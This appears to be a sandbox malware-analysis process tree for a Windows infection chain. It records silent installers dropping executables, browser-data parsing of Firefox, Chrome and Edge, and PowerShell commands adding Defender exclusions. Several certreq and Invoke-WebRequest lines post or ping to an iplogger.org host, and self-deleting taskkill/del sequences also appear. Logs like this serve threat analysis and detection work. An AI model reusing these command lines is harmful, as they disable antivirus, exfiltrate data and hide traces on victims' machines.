C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff75f747740,0x7ff75f747750,0x7ff75f74776018⤵PID:8652
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5272 /prefetch:817⤵PID:8588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5124 /prefetch:817⤵PID:8668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:817⤵PID:8740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4980 /prefetch:817⤵PID:8808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1540 /prefetch:817⤵PID:8980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=840 /prefetch:817⤵PID:9036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:817⤵PID:9064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:817⤵PID:9164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:817⤵PID:7032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5360 /prefetch:817⤵PID:7008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2000,3838561690081514472,9387707505184188749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4916 /prefetch:817⤵PID:3292
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg13⤵
- Runs .reg file with regedit
PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox13⤵PID:6480
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome13⤵PID:7832
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge13⤵PID:7904
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\PictureLAb.exe" /Verysilent9⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\is-453OA.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-453OA.tmp\PictureLAb.tmp" /SL5="$204A4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\PictureLAb.exe" /Verysilent10⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\is-H1PBM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-H1PBM.tmp\Setup.exe" /VERYSILENT11⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\is-2RU90.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-2RU90.tmp\Setup.tmp" /SL5="$20552,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-H1PBM.tmp\Setup.exe" /VERYSILENT12⤵PID:3200
-
C:\Users\Admin\AppData\Local\Temp\is-JVNLE.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-JVNLE.tmp\kkkk.exe" /S /UID=lab21413⤵PID:7024
-
C:\Program Files\Windows Portable Devices\XHCUGOIADB\prolab.exe"C:\Program Files\Windows Portable Devices\XHCUGOIADB\prolab.exe" /VERYSILENT14⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\is-BCVT8.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-BCVT8.tmp\prolab.tmp" /SL5="$80058,575243,216576,C:\Program Files\Windows Portable Devices\XHCUGOIADB\prolab.exe" /VERYSILENT15⤵PID:6720
-
-
-
C:\Users\Admin\AppData\Local\Temp\fd-4f291-23b-7138d-ee33127237762\Mymaeraelusha.exe"C:\Users\Admin\AppData\Local\Temp\fd-4f291-23b-7138d-ee33127237762\Mymaeraelusha.exe"14⤵PID:4592
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oitzteqy.po0\GcleanerWW.exe /mixone & exit15⤵PID:7816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe & exit15⤵PID:4164
-
C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe16⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\yn1xeq4t.rrn\privacytools5.exe17⤵PID:7856
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\scbmdhod.nki\setup.exe /8-2222 & exit15⤵PID:7296
-
C:\Users\Admin\AppData\Local\Temp\scbmdhod.nki\setup.exeC:\Users\Admin\AppData\Local\Temp\scbmdhod.nki\setup.exe /8-222216⤵PID:7692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Winter-Silence"17⤵PID:8580
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\knvaywn3.kz2\MultitimerFour.exe & exit15⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\knvaywn3.kz2\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\knvaywn3.kz2\MultitimerFour.exe16⤵PID:7676
-
C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:7968
-
C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9PF9AI9C2K\multitimer.exe" 1 3.1615014714.60432b3a1c73e 10418⤵PID:9104
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\Delta.exe" /Verysilent9⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\is-K28UO.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-K28UO.tmp\Delta.tmp" /SL5="$304B0,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\Delta.exe" /Verysilent10⤵PID:7096
-
C:\Users\Admin\AppData\Local\Temp\is-V1D9H.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V1D9H.tmp\Setup.exe" /VERYSILENT11⤵PID:6548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-V1D9H.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit12⤵PID:7516
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f13⤵
- Kills process with taskkill
PID:5496
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\zznote.exe" /Verysilent9⤵PID:5008
-
C:\Users\Admin\AppData\Local\Temp\is-HV76R.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-HV76R.tmp\zznote.tmp" /SL5="$5050A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-S02H2.tmp\zznote.exe" /Verysilent10⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\is-AR5D9.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-AR5D9.tmp\jg4_4jaa.exe" /silent11⤵PID:8204
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yi0zmfkvuqw\safebits.exe"C:\Users\Admin\AppData\Local\Temp\yi0zmfkvuqw\safebits.exe" /S /pubid=1 /subid=4515⤵
- Executes dropped EXE
PID:1332
-
-
C:\Users\Admin\AppData\Local\Temp\rpmol1xmar0\1nwdsdrt3mu.exe"C:\Users\Admin\AppData\Local\Temp\rpmol1xmar0\1nwdsdrt3mu.exe" 57a764d042bf85⤵
- Executes dropped EXE
PID:808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\GY2FU07HUF\GY2FU07HU.exe" 57a764d042bf8 & exit6⤵PID:4608
-
C:\Program Files\GY2FU07HUF\GY2FU07HU.exe"C:\Program Files\GY2FU07HUF\GY2FU07HU.exe" 57a764d042bf87⤵PID:1104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\e5anovlm0jq\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\e5anovlm0jq\chashepro3.exe" /VERYSILENT5⤵
- Executes dropped EXE
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\is-83IHB.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-83IHB.tmp\chashepro3.tmp" /SL5="$50148,2015144,58368,C:\Users\Admin\AppData\Local\Temp\e5anovlm0jq\chashepro3.exe" /VERYSILENT6⤵PID:4108
-
-
-
C:\Users\Admin\AppData\Local\Temp\zppgwb3bb0i\app.exe"C:\Users\Admin\AppData\Local\Temp\zppgwb3bb0i\app.exe" /8-235⤵PID:4632
-
C:\Program Files (x86)\Dawn-Darkness\7za.exe"C:\Program Files (x86)\Dawn-Darkness\7za.exe" e -p154.61.71.13 winamp-plugins.7z6⤵PID:5340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Dawn-Darkness\app.exe" -map "C:\Program Files (x86)\Dawn-Darkness\WinmonProcessMonitor.sys""6⤵PID:6844
-
C:\Program Files (x86)\Dawn-Darkness\app.exe"C:\Program Files (x86)\Dawn-Darkness\app.exe" -map "C:\Program Files (x86)\Dawn-Darkness\WinmonProcessMonitor.sys"7⤵PID:7012
-
-
-
C:\Program Files (x86)\Dawn-Darkness\7za.exe"C:\Program Files (x86)\Dawn-Darkness\7za.exe" e -p154.61.71.13 winamp.7z6⤵PID:5564
-
-
C:\Program Files (x86)\Dawn-Darkness\app.exe"C:\Program Files (x86)\Dawn-Darkness\app.exe" /8-236⤵PID:6612
-
-
-
C:\Users\Admin\AppData\Local\Temp\zubxkghzrd3\3fzxlwbxjhl.exe"C:\Users\Admin\AppData\Local\Temp\zubxkghzrd3\3fzxlwbxjhl.exe" /ustwo INSTALL5⤵PID:488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 6566⤵
- Program crash
PID:5372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 6726⤵
- Program crash
PID:5580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 7526⤵
- Program crash
PID:5704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 8086⤵
- Program crash
PID:6088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 8766⤵
- Program crash
PID:5524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 9246⤵
- Program crash
PID:1956
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 10886⤵
- Program crash
PID:4120
-
-
-
C:\Users\Admin\AppData\Local\Temp\tz0opdadjis\vpn.exe"C:\Users\Admin\AppData\Local\Temp\tz0opdadjis\vpn.exe" /silent /subid=4825⤵
- Executes dropped EXE
PID:3624
-
-
C:\Users\Admin\AppData\Local\Temp\31gzd0lwhav\gi3tpwy1sjt.exe"C:\Users\Admin\AppData\Local\Temp\31gzd0lwhav\gi3tpwy1sjt.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:720
-
-
C:\Users\Admin\AppData\Local\Temp\trtxm4pbwex\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\trtxm4pbwex\askinstall24.exe"5⤵
- Executes dropped EXE
PID:2904 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:5516
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-445R3.tmp\gi3tpwy1sjt.tmp"C:\Users\Admin\AppData\Local\Temp\is-445R3.tmp\gi3tpwy1sjt.tmp" /SL5="$401DA,870426,780800,C:\Users\Admin\AppData\Local\Temp\31gzd0lwhav\gi3tpwy1sjt.exe" /VERYSILENT1⤵
- Executes dropped EXE
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\is-FT504.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-FT504.tmp\winlthst.exe" test1 test12⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\2rBPJ2wf0.exe"C:\Users\Admin\AppData\Local\Temp\2rBPJ2wf0.exe"3⤵PID:5864
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 2rBPJ2wf0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2rBPJ2wf0.exe" & del C:\ProgramData\*.dll & exit4⤵PID:6392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 2rBPJ2wf0.exe /f5⤵
- Kills process with taskkill
PID:6668
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:6960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-AR8P3.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-AR8P3.tmp\vpn.tmp" /SL5="$10274,15170975,270336,C:\Users\Admin\AppData\Local\Temp\tz0opdadjis\vpn.exe" /silent /subid=4821⤵PID:4124
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:696
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:5764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:1856
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:5976
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:4948
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:8368
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4352
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:4372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵PID:4428
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"1⤵PID:4464
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4580
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:4192
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"1⤵PID:4732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Dawn-Darkness"1⤵PID:4288
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw1⤵PID:1576
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"1⤵PID:4804
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys2⤵PID:1252
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:5356
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"1⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\is-45NGH.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-45NGH.tmp\wimapi.exe" 5351⤵PID:4512
-
C:\Users\Admin\AppData\Local\Temp\ui2KdguXQ.exe"C:\Users\Admin\AppData\Local\Temp\ui2KdguXQ.exe"2⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ui2KdguXQ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ui2KdguXQ.exe" & del C:\ProgramData\*.dll & exit3⤵PID:6492
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ui2KdguXQ.exe /f4⤵
- Kills process with taskkill
PID:6736
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:6992
-
-
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"1⤵PID:4504
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"2⤵PID:6852
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵PID:4384
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5732
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5916
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5916 -s 15042⤵
- Program crash
PID:1400
-
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6080
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1308
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5608
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6420
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6980
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{088e8c02-b13e-5645-9422-427281a7cb3a}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:3184
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"2⤵PID:6616
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7064
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7072